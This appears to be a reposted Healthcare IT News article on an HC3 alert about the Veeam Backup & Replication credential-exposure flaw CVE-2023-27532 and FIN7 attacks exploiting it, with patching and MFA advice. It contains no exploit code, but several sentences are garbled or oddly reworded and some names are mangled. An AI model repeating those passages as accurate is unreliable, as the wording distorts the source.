/cdn.vox-cdn.com/uploads/chorus_asset/file/23962442/acastro_STK067__03.jpg)
/cdn.vox-cdn.com/uploads/chorus_asset/file/24247717/lp_logo_3.0.jpg){kind=logo}
/cdn.vox-cdn.com/uploads/chorus_asset/file/24016885/STK093_Google_04.jpg)
/cdn.vox-cdn.com/uploads/chorus_asset/file/24808816/Starfield__The_Settled_Systems___Supra_Et_Ultra_____Starfield__The_Settled_Systems___Su)
[ad_1]
According to the vendor, unauthenticated users can gain access to a network operating Veeam within the backup infrastructure network perimeter and obtain encrypted credentials stored in the configuration database.
why it matters
Following a growing number of cyber attacks exploiting the Veeam Backup & Replication software vulnerability, tracked as CVE-2023-27532, the Health Sector Cyber Security Coordinating Center recommends that all healthcare organizations keep user systems up to date and fix weaknesses.
“What makes this threat significant is that in addition to backing up and recovering VMs, it can be used to store personal files and applications for environments such as Microsoft Exchange and SharePoint used in the HPH area,” the agency said. This is done for protection and restoration.” Analysis Note dated 10 May.
The software also has the ability to provide transaction-level restore of Oracle and Microsoft SQL databases.
Veeam issued an alert to its customers on March 7, noting the vulnerable process Veeam.Backup.Service.exe – TCP 9401 by default – and advised them to update their software.
With Secure Labs identified a financially motivated cybercrime group – Fin7 – in recent attacks on Veeam servers.
“On March 28, 2023, initial activity was observed across Internet-facing servers running Veeam Backup and Replication software,” according to its website.
“A SQL Server process ‘sqlservr.exe’ executed a shell command belonging to the Veeam Backup instance, which performed an in-memory download and execution of a PowerShell script.”
Withsecure Labs reported that the threat actor tested lateral movement with exfiltrated credentials.
big trend
Whether it’s with phishing scams, exploiting vulnerabilities to steal credentials, or taking advantage of insider threat schemes, hospitals, health plans, and other healthcare organizations are prime targets for bad actors who are always in a network. Let’s find an easy way out.
“Organizations should review their identity and access management implementations to force the use of multifactor authentication,” John Hendley, head of strategy at IBM Security X-Force, advised in the 2022 Data Breach Costs report.
“Just this one step goes a long way in curbing the ability of cybercriminals to use stolen credentials, one of their preferred methods of initial compromise.”
On the record
“HC3 recommends that all HPH field entities be vigilant and aware of suspicious activity, keep systems updated and fix any vulnerable systems immediately,” the agency said in the alert note.
“In addition, organizations are encouraged to take a proactive approach by using CISA’s free cyber security services and tools to strengthen their cyber posture.”
Andrea Fox is a senior editor for Healthcare IT News.
Email: afox@himss.org
Healthcare IT News is a HIMSS Media publication.
